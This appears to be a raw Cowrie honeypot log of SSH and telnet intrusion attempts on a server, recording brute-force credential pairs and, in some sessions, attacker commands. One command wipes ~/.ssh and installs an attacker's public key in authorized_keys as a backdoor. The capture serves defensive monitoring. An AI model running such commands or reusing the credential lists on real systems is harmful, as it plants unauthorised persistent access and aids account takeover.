{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:53.852331Z","src_ip":"212.227.235.229","session":"f2f5bd2cd81c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58710,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc793c92bdf6","protocol":"ssh","message":"New connection: 212.227.235.229:58710 (1.2.3.4:22) [session: dc793c92bdf6]","sensor":"my-vps","timestamp":"2025-08-31T06:02:54.633275Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:02:55.081852Z","src_ip":"212.227.235.229","session":"f2f5bd2cd81c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:55.381434Z","src_ip":"212.227.235.229","session":"f2f5bd2cd81c"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:55.407210Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":57134,"dst_ip":"1.2.3.4","dst_port":22,"session":"76099d286af9","protocol":"ssh","message":"New connection: 43.159.36.188:57134 (1.2.3.4:22) [session: 76099d286af9]","sensor":"my-vps","timestamp":"2025-08-31T06:02:56.168364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:56.169261Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:56.414443Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.login.success","username":"root","password":"kiki","message":"login attempt [root/kiki] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:02:57.435992Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:57.952946Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:02:57.953773Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:02:57.954765Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:58.201893Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:58.753727Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:02:58.754428Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:02:59.001910Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:59.002885Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":57144,"dst_ip":"1.2.3.4","dst_port":22,"session":"87088de2c2e3","protocol":"ssh","message":"New connection: 43.159.36.188:57144 (1.2.3.4:22) [session: 87088de2c2e3]","sensor":"my-vps","timestamp":"2025-08-31T06:02:59.245553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:59.246476Z","src_ip":"43.159.36.188","session":"87088de2c2e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:59.490996Z","src_ip":"43.159.36.188","session":"87088de2c2e3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:03:00.513871Z","src_ip":"43.159.36.188","session":"87088de2c2e3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:01.762544Z","src_ip":"43.159.36.188","session":"87088de2c2e3"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":57154,"dst_ip":"1.2.3.4","dst_port":22,"session":"99958de9dc47","protocol":"ssh","message":"New connection: 43.159.36.188:57154 (1.2.3.4:22) [session: 99958de9dc47]","sensor":"my-vps","timestamp":"2025-08-31T06:03:02.006807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:03:02.007627Z","src_ip":"43.159.36.188","session":"99958de9dc47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:03:02.252966Z","src_ip":"43.159.36.188","session":"99958de9dc47"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:03:03.275724Z","src_ip":"43.159.36.188","session":"99958de9dc47"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:03.522351Z","src_ip":"43.159.36.188","session":"76099d286af9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:03.523246Z","src_ip":"43.159.36.188","session":"99958de9dc47"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:03:05.704290Z","src_ip":"212.227.125.160","session":"2cc149268be8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:03:06.070642Z","src_ip":"212.227.235.229","session":"dc793c92bdf6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:03:06.071361Z","src_ip":"212.227.235.229","session":"dc793c92bdf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50502,"dst_ip":"1.2.3.4","dst_port":22,"session":"0edf7f43df43","protocol":"ssh","message":"New connection: 212.227.235.229:50502 (1.2.3.4:22) [session: 0edf7f43df43]","sensor":"my-vps","timestamp":"2025-08-31T06:03:10.987883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:03:11.910795Z","src_ip":"212.227.235.229","session":"0edf7f43df43"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:03:11.911833Z","src_ip":"212.227.235.229","session":"0edf7f43df43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45672,"dst_ip":"1.2.3.4","dst_port":23,"session":"aaf3ecd203d8","protocol":"telnet","message":"New connection: 212.227.235.229:45672 (1.2.3.4:23) [session: aaf3ecd203d8]","sensor":"my-vps","timestamp":"2025-08-31T06:03:17.747285Z"}
{"eventid":"cowrie.login.failed","username":"test3","password":"root123","message":"login attempt [test3/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:03:17.962393Z","src_ip":"212.227.235.229","session":"0edf7f43df43"}
{"eventid":"cowrie.session.closed","duration":"58.3","message":"Connection lost after 58.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:18.734213Z","src_ip":"212.227.125.160","session":"2cc149268be8"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:19.752222Z","src_ip":"212.227.235.229","session":"0edf7f43df43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56966,"dst_ip":"1.2.3.4","dst_port":22,"session":"6176ebec631c","protocol":"ssh","message":"New connection: 212.227.125.160:56966 (1.2.3.4:22) [session: 6176ebec631c]","sensor":"my-vps","timestamp":"2025-08-31T06:03:29.773418Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40308,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbba7e627b04","protocol":"ssh","message":"New connection: 212.227.125.160:40308 (1.2.3.4:22) [session: cbba7e627b04]","sensor":"my-vps","timestamp":"2025-08-31T06:03:32.687475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:03:33.143337Z","src_ip":"212.227.125.160","session":"cbba7e627b04"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:03:33.144729Z","src_ip":"212.227.125.160","session":"cbba7e627b04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58794,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f8333d577b6","protocol":"ssh","message":"New connection: 212.227.235.229:58794 (1.2.3.4:22) [session: 7f8333d577b6]","sensor":"my-vps","timestamp":"2025-08-31T06:03:34.521962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:03:34.523017Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:03:34.808120Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.login.failed","username":"test3","password":"root123","message":"login attempt [test3/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:03:35.322449Z","src_ip":"212.227.125.160","session":"cbba7e627b04"}
{"eventid":"cowrie.login.success","username":"root","password":"Wo123456","message":"login attempt [root/Wo123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:03:35.991307Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:03:36.583338Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:03:36.584038Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:03:36.585289Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:36.863157Z","src_ip":"212.227.125.160","session":"cbba7e627b04"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:36.871064Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50684,"dst_ip":"1.2.3.4","dst_port":22,"session":"26640191d957","protocol":"ssh","message":"New connection: 217.72.205.35:50684 (1.2.3.4:22) [session: 26640191d957]","sensor":"my-vps","timestamp":"2025-08-31T06:03:37.339389Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:37.340470Z","src_ip":"217.72.205.35","session":"26640191d957"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:03:37.918450Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
